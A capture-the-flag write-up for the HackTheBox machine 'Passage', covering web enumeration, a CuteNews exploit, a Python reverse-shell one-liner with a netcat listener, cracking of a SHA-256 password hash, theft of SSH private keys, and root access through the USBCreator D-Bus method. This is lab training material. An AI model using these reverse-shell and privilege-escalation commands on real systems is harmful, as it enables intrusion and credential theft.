This is a write up for the machine “Passage” on HackTheBox. It is medium difficulty level machine.
I’d first start by enumerating the target with ‘nmap’ using the following commands
nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.206
nmap -p 22,80 -sC -sV 10.10.10.206
Since port 80 is open, let’s test the web application. I visited http://10.10.10.206:80 and found nothing interesting. On viewing the page source I noticed that it had another page http://10.10.10.206:80/CuteNews
Like everyone, I tried fuzzing for more hidden pages and they blocked me for a while. I had to wait for a few minutes to reach the website again. On its home page, I found that it was running an Intrusion Prevention Software called Fail2Ban that explained the blocking. Then, I moved on to visit http://10.10.10.206:80/CuteNews and got a login page.
I tried all the default credentials but nothing worked. From the login page, I found that it was running CuteNews 2.1.2. I googled for exploits and got this page by exploit-db. I downloaded it and used this command to execute.
Upon entering the URL as an input, I got the shell straight away. Then I used the following command to get a better shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR IP",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I also had ‘netcat’ listening on port 4242.
nc -lvnp 4242
python3 -c "import pty;pty.spawn('/bin/bash')"
I tried to get the user.txt flag and I didn't have permissions to access it. When I checked the ‘/home’ directory I found two users ‘paul’ and ‘nadav’. Before I execute the exploit from ‘exploit-db’, I looked into its content and found that it was trying to decode a base64 file named ‘lines’ in the location ‘/CuteNews/cdata/users.
I opened ‘lines’ and it was base64 encoded. I tried decoding it using an online base64 decoder.
I got the below content after decoding.
Then, I tried to identify the hash (e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd)used to encrypt the password using ‘hash-identifier’ and it dentified the hash as SHA-256. After that, cracked the password using the following command:
john --wordlist=<YOUR-WORDLIST> --format=raw-sha256 user.txt
Here, I copied the hash to user.txt
echo “e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd” > user.txt
Now, I could change to paul with the password ‘atlanta1’.
I got the user flag from /home/paul. This was everything that’s possible with paul. While I was checking for ways to switch users, I found this file ‘/home/paul/.ssh/authorized_keys’
Before using ssh to login as nadav, I copied id_rsa (/home/paul/.ssh/id_rsa) of paul into my local machine so I could easily access paul and then switched to nadav
I still couldn’t access root.txt. So, I kept on searching for interesting files. After hours of search, I noticed something interesting in ‘/home/nadav/.viminfo’ which usually stores information like command line history, search string history, input line history, file marks, history of file marks and many more. When I looked into it he was editing ‘/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf’
Also, while running linpeas.sh, I got the below findings
Since I found dbus-1.0 in both these files, I thought I’ll just google about it and check for some known vulnerabilities. I found that dbus is used for communication between multiple processes running concurrently on the same machine. This article by Nadav Markus describes everything you need to know about exploiting this service. Then I used the following commands to get the ‘root.txt
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /root.txt true
The above command copy files from one location to another without prompting for password and checking the destination. This would allow any user to write files anywhere in the system without prompting for a password. Now I could read the root.txt. But CTF is not just about root.txt or user.txt(its about FUN), so I used the command below to copy ‘root/.ssh/id_rsa’ and got the root key.
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /id_rsa true
This bug was later fixed by Ubuntu. Now, the user will have to enter a password for using USBCreator.